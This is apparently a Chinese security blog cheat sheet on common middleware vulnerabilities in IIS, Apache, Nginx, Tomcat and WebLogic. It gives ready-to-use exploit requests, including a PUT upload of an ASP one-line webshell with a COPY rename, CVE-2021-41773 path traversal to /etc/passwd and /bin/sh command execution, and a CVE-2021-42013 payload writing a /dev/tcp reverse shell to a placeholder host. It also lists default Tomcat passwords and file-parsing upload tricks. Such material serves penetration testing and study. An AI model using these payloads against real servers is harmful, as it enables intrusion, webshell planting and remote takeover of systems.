常见中间件框架漏洞

发表于2023-08-20更新于2024-02-28

IIS

  • IIS6.0解析漏洞

    • 文件解析:上传文件,命名为:test.asp;jpg
    • 文件夹解析:新建文件夹test.asp,文件夹下的所有文件都会被当成asp去解析

  • IIS7.5解析漏洞

    • 上传文件:test.jpg,访问路径:…/image/test.jpg/1.php

  • PUT任意文件上传

    1. 探测是否允许PUT
    1
    2
    OPTIONS /x HTTP1.1
    Host:www.xxx.com
    1. 上传txt文件
    1
    2
    3
    4
    5
    PUT /a.txt HTTP1.1
    Host: www.xxx.com
    Content-Length:30

    <%execute request("123456")%>    #上传的文件内容
    1. 通过move或copy重命名
    1
    2
    3
    COPY /a.txt HTTP1.1
    Host: www.xxx.com
    Destination:http://www.xxx.com/cmd.asp    #将a.txt重命名为cmd.asp

Apache

  • Apache解析漏洞

    • 上传文件:a.php.xxx,apache从右往左解析,解析不了,继续向前解析

  • CVE-2021-41773

    • Apache HTTP Server 2.4.49、4.4.50存在,利用该漏洞读取到路径外其他文件,系统配置文件、网站源码等

    • 文件读取

      1
      GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

    • RCE命令执行

      1
      2
      3
      4
      5
      POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
      Host: 118.193.36.37:53238
      Content-Type: text/plain
      Content-Length: 8
      echo; id

  • CVE-2021-42013

    • 写个反弹shell

      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
      %%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
      Host: 123.58.224.8:29045
      Cache-Control: max-age=0
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (
      KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,i
      mage/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9
      Connection: close
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 78
      echo; echo "exec /bin/sh 0</dev/tcp/x.x.x.x/8888 1>&0 2>&0" > /tmp/a.sh

Nginx

  • Nginx解析漏洞
    • nginx_parsing_vulnerability
    • 上传abc.png图片,访问路径:/abc.png/.php
  • Nginx文件名逻辑漏洞
    • CVE-2013-4547
    • 上传一个”1.gif “文件 (注意”1.gif “文件后缀后面有空格)
    • 访问uploadfiles/1.gif[0x20][0x00].php
  • Nginx任意代码执行漏洞(CVE-2021-23017)

Tomcat

  • Tomcat后台弱口令

    • tomcat:tomcat

    • admin:admin

    • 登录后台上传war包:

      1
      jar -cvf abc.war abc.jsp

  • Tomcat任意文件上传(CVE-2017-12615)

    • Apache Tomcat 7.0.0 - 7.0.81

    • 抓包修改请求方式为OPTIONS,查看支持的方法

    • 修改为PUT

      1
      2
      3
      4
      PUT /abc.jsp/ HTTP/1.1
      Host: 123.58.224.8:23405
      Cache-Control: max-age=0
      <%! %>

    • 访问上传的文件

  • Apache Tomcat AJP文件包含漏洞(CVE-2020-1938)

WebLogic

  • WebLogic XMLDecoder反序列化漏洞(CVE-2017-3506)

    • 影响版本:

      10.3.6.0.0

      12.1.3.0.0

      12.2.1.1.0

      12.2.1.2.0

  • WebLogic T3协议反序列化漏洞(CVE-2018-2628)

    • 影响版本:

      10.0.6.0

      12.1.3.0

      12.2.1.2

      12.2.1.3

  • WebLogic未授权访问漏洞(CVE-2020-14882)

  • WebLogic命令执行漏洞(CVE-2020-14883)

  • WebLogic IIOP协议反序列化漏洞(CVE-2020-2551)

其他中间件